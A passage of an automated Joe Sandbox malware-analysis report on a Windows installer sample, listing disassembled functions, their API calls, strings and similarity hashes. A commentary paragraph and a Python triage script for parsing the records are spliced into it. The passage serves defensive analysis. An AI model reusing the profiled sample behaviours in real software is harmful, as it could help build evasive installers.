                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2481121983-1280779767
                                                                                                      • Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                                                      • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                                                                      • Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                                                      • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                                                                      APIs
                                                                                                        • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                        • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                                                                      • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                                                        • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                      • 73A15CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                      • API String ID: 170458502-2312673372
                                                                                                      • Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                                                      • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                                                                      • Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                                                      • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                      • API String ID: 4190037839-1003587384
                                                                                                      • Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                                                      • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                                                                      • Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                                                      • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 00462D68
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                                                      • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                                                                      • Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                                                      • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 0042F1A4
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                                                      • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                                                                      • Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                                                      • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
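The three records above resolve imports at run time (GetModuleHandleA followed by GetProcAddress for GetUserDefaultUILanguage, MonitorFromWindow and GetMonitorInfoA), which is the behaviour behind the report's "Contains functionality to dynamically determine API calls" signature. Two caveats when reading these records: the parenthesised values are a stack snapshot at the call site rather than the function's real parameters (Sleep takes one argument but is listed with eleven, and the name passed to GetProcAddress for kernel32 shows up in the neighbouring GetModuleHandleA slot), and the strings in the surrounding records (the 64-bit helper process messages, /SECONDPHASE and /FIRSTPHASEWND, _iu temp files, SharedDLLs reference counting, UnRegisterTypeLib) are the stock Inno Setup installer and uninstaller runtime rather than payload logic. The script below is an added example, not Joe Sandbox or analyst code: it parses records in this listing format into structured data and pulls out dynamically resolved imports, loaded modules, unsymbolised call targets (such as 73A15CF0.USER32) and registry-style paths, so installer boilerplate can be separated from the functions worth reading. The record layout is inferred from this page; SAMPLE is constructed from its lines, the third record being a cut-down mix of two.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Strings" / "Similarity"
blocks as listed on this page) and extract triage facts.
Added example, not Joe Sandbox code; the record layout is inferred from the
listing above and SAMPLE is constructed from its lines."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE = r"""
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
Strings
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
APIs
• GetActiveWindow.USER32 ref: 00462D68
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
Strings
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
APIs
  • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
• 73A15CF0.USER32(?,004967CB,00000000), ref: 004967BE
Strings
• Helper process exited., xrefs: 00458E29
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$")
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
SIM_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID): (?P<val>.*)$")
HEX_RE = re.compile(r"^-?[0-9A-F]+$")      # a number or address sitting in a stack slot
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")   # looks like an exported symbol name
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # stack slots at the call site, not checked parameters
    ref: str
    subcall: Optional[str] = None   # set when the call is attributed to a callee


@dataclass
class FuncRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""


def parse_records(text: str) -> List[FuncRecord]:
    """One FuncRecord per 'APIs' header; other section headers only switch mode."""
    records: List[FuncRecord] = []
    cur, section = None, None
    for line in text.splitlines():
        s = line.strip()
        if s in SECTIONS:
            if s == "APIs":
                cur = FuncRecord()
                records.append(cur)
            section = s
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := SIM_RE.match(line)):
            if m["key"] == "API ID":
                cur.api_id = m["val"]
            else:
                cur.string_id = m["val"]
    return records


def dedupe(items: List[str]) -> List[str]:
    seen, out = set(), []
    for x in items:
        if x not in seen:
            seen.add(x)
            out.append(x)
    return out


def triage(rec: FuncRecord) -> dict:
    """Dynamic imports, modules, unsymbolised call targets and path-like strings."""
    imports, modules, unresolved = [], [], []
    for c in rec.calls:
        if HEX_RE.match(c.name):                      # target shown as an address, e.g. 73A15CF0.USER32
            unresolved.append(f"{c.module}!{c.name} @ {c.ref}")
        if c.name in LOADERS or c.name.startswith("GetProcAddress"):
            for a in c.args:                          # scan every slot: names drift between neighbouring calls
                if a.lower().endswith(".dll"):
                    modules.append(a)
                elif IDENT_RE.match(a) and not HEX_RE.match(a):
                    imports.append(a)
    tokens = [t for t, _ in rec.strings] + [t for t in rec.string_id.split("$") if t]
    return {"dynamic_imports": dedupe(imports), "modules": dedupe(modules),
            "unresolved_targets": unresolved, "paths": sorted({t for t in tokens if "\\" in t})}


def report(text: str) -> List[dict]:
    return [triage(r) for r in parse_records(text)]


if __name__ == "__main__":
    for i, findings in enumerate(report(SAMPLE)):
        print(f"record {i}: {findings}")
```

Run it over records copied out of the report; a record whose only findings are installer-runtime strings and no dynamic imports can be set aside, which leaves the functions that carry the payload's own logic for manual review.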
                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02073858,00000000), ref: 00458FDD
                                                                                                      • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                                                      • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                                                      • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                      • String ID: CreateEvent$TransactNamedPipe
                                                                                                      • API String ID: 2182916169-3012584893
                                                                                                      • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                                      • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                                                      • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                                      • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                                                      • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                      • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                      • API String ID: 1914119943-2711329623
                                                                                                      • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                                      • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                                                                      • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                                      • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                                                                      APIs
                                                                                                      • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                                      • SaveDC.GDI32(?), ref: 00416E37
                                                                                                      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                                      • DeleteObject.GDI32(?), ref: 00416F32
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                                      • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 375863564-0
                                                                                                      • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                                      • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                                      • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                                      • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                      • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                      • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                      • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                                      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                                      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                                      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                                      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                                      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                                      • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                                      • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$EnableItem$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 3985193851-0
                                                                                                      • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                                      • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                                      • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                                      • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                                                                      • FreeLibrary.KERNEL32(02380000), ref: 004814AD
                                                                                                      • SendNotifyMessageA.USER32(00020420,00000496,00002710,00000000), ref: 0048151F
                                                                                                      Strings
                                                                                                      • DeinitializeSetup, xrefs: 00481395
                                                                                                      • GetCustomSetupExitCode, xrefs: 00481339
                                                                                                      • Deinitializing Setup., xrefs: 004812FA
                                                                                                      • Restarting Windows., xrefs: 004814FA
                                                                                                      • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                                                                      Memory Dump Source
